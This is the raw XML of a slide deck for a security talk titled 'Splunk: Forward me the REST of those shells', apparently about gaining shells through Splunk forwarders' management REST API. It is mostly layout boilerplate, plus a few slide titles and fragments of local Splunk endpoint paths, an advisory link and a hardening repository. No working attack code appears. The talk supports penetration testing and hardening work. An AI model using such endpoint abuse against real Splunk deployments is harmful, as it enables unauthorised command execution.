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32"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId33"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="274" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="258"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5" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="27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7" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="176"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7F6984-B3AE-0A4E-8A0E-69D2C4C95334}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18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9E0458F-2BE1-5946-BB05-779CFEB1946B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18579051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3D5575-C6DA-8B41-B412-E006EF153C5C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18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5BA0E5-6694-AD48-AB8A-1AEE950A6EE4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2114628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2213F-ABBB-4B45-B48D-6EC8A7A49D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1C37BD-0965-184F-BF9F-112B242F55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692867-F64D-A742-8C17-6FF18EB4AB79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4D4A30-7073-4C46-9A2B-0D544F3636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D9330E-9199-8E4C-B9AD-E8138E695B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291521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409A7-6B78-2F4C-840D-C37455ADE4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899979-8822-2F4E-A08C-B7F6C2E2C9B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2EF8E0-C6CE-5243-B10E-FDDF18674892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB788AD-A8F1-E646-99F5-1B42CED0E4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DA6BCB-490C-5D46-B9AD-A7872645D719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4112785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75E5DC-A748-EA47-8853-675858E4AF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214267-BC02-6244-BEF0-B1A8CBC9667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BDDA68-FD3A-A34C-AD5A-FD777D5B9610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C025A018-576E-1E49-BD24-A69A25D02F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E90A0A-2B4E-4745-971A-6F5CC02C6D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3443602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78B42-BC9E-EC49-80DE-E2014DC5FF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63131D-EA1F-894D-B6D2-78BCC0A0D3E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24A683-7ABF-6A4B-B2B3-F9F5CEBF08E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999810F0-38EC-AE4D-A675-F3E81DBED1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0D30B-EED4-4441-BCAE-8CF992E75F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4184336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4C845-EFAD-DD46-9AAA-2866CCB793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27FF1A-BF9B-FA42-AAC3-B4D3891A25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5C2DD40-8C39-B140-98D6-7C815E7875EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E7E97E-CB65-CF40-A7DB-863DC1C86A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D74624-84D9-4741-86AB-5655BA758B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24689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5A9E2-3D23-1647-A749-2623391621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3FFAC2-0B03-284F-9E53-613CE2A7265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1E729D-5351-ED4A-90F3-5CDC6C9905A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12C9E8-A826-F549-BC99-1BA8ED056E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42809F1D-631D-B44D-A95E-0BE78F2442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CEB7E6-0C66-D34C-8543-8505DD0F3A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505158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26D95-6992-C444-95BF-7328BE80B8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3AEF6F-C616-844B-8DCF-ED49E589E0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88FE1A-B7B9-264B-B84D-0707F36B336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4CEC72-3738-2748-8F11-BB759DF320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163B12E-4ADE-8343-A293-4B8D838180B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D444E9-281C-6741-AEF7-DA7EB0752390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267418E3-2682-E645-9B1D-B1BA6FB7C1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BDFDE6-5E5D-464A-92B5-331DFEACF42C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3552774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9D8E7-4644-7F4A-92DD-F38F7C3FDC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F10C29-DB8E-394B-A827-CABEA21E344C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8E9B1DA-456E-2144-B677-D4D7608FDA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7E4EE6-19E8-C348-8B98-7434C7A00BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49809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A5D188-1AA1-774A-BB37-B5552325EAF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B79591-E5DD-8248-AE5B-81B11CFDD3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3FFFCF-960F-BA44-8285-CC5A7F990D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832274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79CE8-845E-A64B-ABE7-19E0CE5E32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696B39-F0D0-C946-929A-88CC0C21BA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BC22CC-CF14-0A48-970F-364D6CE8EF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B7945A-64DA-8241-A91C-17B981F0FA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE925D1-C21C-3A4C-A7AB-070E9A08A3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E31BCA-9ADE-BA49-B5BB-785F61925F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2714143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9FC4D-5FDF-E344-B027-EE0AF6F28C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300EB1-EE79-CB4D-B119-A8449B3C52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78932D-5E21-E94E-BDE4-E15D31EEDB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15374A-312F-4E49-A183-852F7A775D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A151F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1839B405-883D-644C-9596-9F6113F433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0D988A-81AD-3443-8924-C33A4D0620DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{327807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3145824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41F92F-E834-3741-8965-15EAB190A9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B523F0-BF31-1C44-978E-3FC61FBF2E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5FCA5-C9AA-8749-9EE2-E552DDBDCA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51F81B-AF01-433D-865C-7F5E2729723A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/15/18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141A81C1-A55E-A649-B634-EE001F6570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91A869-9206-2C43-AEC5-1DC10B39D7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7807CF-4128-491F-B738-8374AA27E0D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1950425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127.0.0.1:8089/services/deployment/cli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localhost:8090/services/apps/loca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localhost:8090/servicesNS/nobody/system/admin/logger/HTTPAcces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splunk.com/view/SP-CAAAP3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MattUebel/splunk_UF_harden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Splunk: Forward me the REST of those shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="533975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http://img.endmassincarceration.org/2016/10/17/with-our-powers-combined-captain-planet-l-f16abae43851de99.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76CD2EC-2981-394E-81E9-7F48A3AC8F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5772" y="2813322"/>
            <a:ext cx="3933309" cy="378331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Blue Team Turned Evil?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can I use this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assemble the brain-trust!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20985506">
            <a:off x="3706832" y="6228919"/>
            <a:ext cx="1370888" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:ea typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="Comic Sans MS" charset="0"/>
              </a:rPr>
              <a:t>Pentesters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" charset="0"/>
              <a:ea typeface="Comic Sans MS" charset="0"/>
              <a:cs typeface="Comic Sans MS" charset="0"/>
            </a:endParaRPr>
          </a:p>
